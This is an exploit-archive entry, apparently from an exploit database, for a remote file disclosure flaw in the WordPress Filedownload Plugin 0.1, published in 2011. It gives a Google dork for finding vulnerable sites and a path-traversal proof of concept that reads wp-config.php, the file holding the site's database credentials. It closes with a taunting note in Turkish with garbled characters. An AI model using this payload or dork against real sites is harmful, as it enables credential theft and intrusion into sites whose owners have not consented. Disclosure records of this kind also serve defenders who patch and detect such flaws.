[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Published : 2011-09-19
# Author :
# Previous Title : Cogent DataHub <= 7.1.1.63 Source Disclosure
# Next Title : tsmim Lessons Library (show.php) SQL Injection
# Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
# Date: 18-09-2011
# Author: Septemb0x ( CYBER-WARRIOR )
# Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
# Version: 0.1
POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
# NOTE: Kendini Birtey Zanneden Velet Senin Hi? B?yle Bug'n Oldumu ki Sitelerime Yndex Basasyn? ?pt¨¹m B¨¹y¨¹de Gel.